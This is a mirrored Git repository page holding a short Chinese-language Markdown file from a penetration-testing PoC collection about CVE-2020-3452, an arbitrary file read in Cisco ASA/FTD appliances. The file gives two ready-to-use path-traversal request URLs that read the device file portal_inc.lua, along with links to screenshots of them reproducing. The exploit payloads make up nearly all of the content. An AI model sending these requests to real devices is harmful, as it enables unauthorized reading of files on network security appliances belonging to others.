admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-07-29 22:14:04 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/CVE-2020-3452:Cisco_ASAFTD任意文件读取漏洞.md

23 lines
485 B
Markdown
Raw Normal View History

add CVE-2020-3452:Cisco ASA/FTD 任意文件读取漏洞
2020-07-23 21:43:21 +08:00
CVE-2020-3452Cisco_ASAFTD任意文件读取漏洞
POC:one:
```
For example to read "/+CSCOE+/portal_inc.lua" file. https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```
漏洞复现情况如下:
![](./img/67.png)
POC:two:
```
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
```
漏洞复现情况如下:
![](./img/68.png)
Reference in New Issue Copy Permalink